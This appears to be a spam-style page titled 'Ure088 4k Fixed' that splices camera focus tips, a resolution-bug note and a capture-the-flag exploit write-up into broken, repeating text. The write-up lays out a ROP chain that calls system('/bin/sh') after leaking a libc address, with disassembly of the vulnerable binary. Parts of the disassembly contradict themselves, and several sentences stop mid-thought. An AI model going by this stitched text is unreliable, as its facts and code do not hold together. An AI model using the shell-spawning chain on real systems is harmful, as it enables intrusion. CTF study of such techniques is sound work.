Ure088 4k Fixed -

Ure088 4k Fixed -

Although fixed-focus, many Ure088 models include a small back-focus ring (behind the lens). Adjust during installation:

This is not an official term, but it’s used by encoding groups to indicate two things:

Common “fixes” include:

Stage 1 – Leak

Stage 2 – ROP

[ padding (256) ]
[ RIP -> pop rdi ; ret ]      <-- gadget to control first argument
[ address_of_string "/bin/sh" in .bss or on stack ]
[ RIP -> system@libc ]        <-- calls execve
[ (optional) exit@libc ]      <-- clean exit after shell

Because the binary is static‑linked except for libc, we can use pop rdi ; ret from the binary itself (e.g., at 0x4006a3).

The analysis revealed that the issue stemmed from a misconfiguration in the resolution settings for ure088. Specifically, a hardcoded value was overriding the 4k setting, causing it to default to a lower resolution. ure088 4k fixed

Running the binary locally gives the following interaction (the exact prompt may vary):

$ ./ure088
Welcome to the 4k fixed challenge!
Please enter your name:

After typing a name, the program prints:

Hello, <name>!
Here is your secret: <some string>

The “secret” part is actually a leak of a libc address when we overflow a buffer. Although fixed-focus, many Ure088 models include a small

Disassembly (relevant parts) (IDA/Ghidra snippets)

0x004008f0 <main>:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x120          ; reserve 0x120 (288) bytes on stack
    lea     rdx, [rbp-0x110]    ; rdx = &buf (size 0x100)
    mov     esi, 0x100          ; length = 256
    mov     edi, 0x0            ; stdin
    call    fread               ; read up to 256 bytes into buf
; ----  vulnerable printf  ----
    lea     rdi, format_str     ; "Hello, %s!\n"
    mov     rsi, [rbp-0x110]    ; user supplied string
    xor     eax, eax
    call    printf
; ----  secret leak  ----
    mov     rdi, stdout
    mov     rsi, offset puts_got ; address of puts in GOT
    call    fprintf             ; prints the *current* address of puts
; exit
    mov     eax, 0
    leave
    ret

Observations

Because the binary is non‑PIE, the address of puts in the GOT is a static offset (0x601018 in this build). However, the actual libc address printed is runtime‑dependent (different on each host). Common “fixes” include: Stage 1 – Leak

Therefore, we can: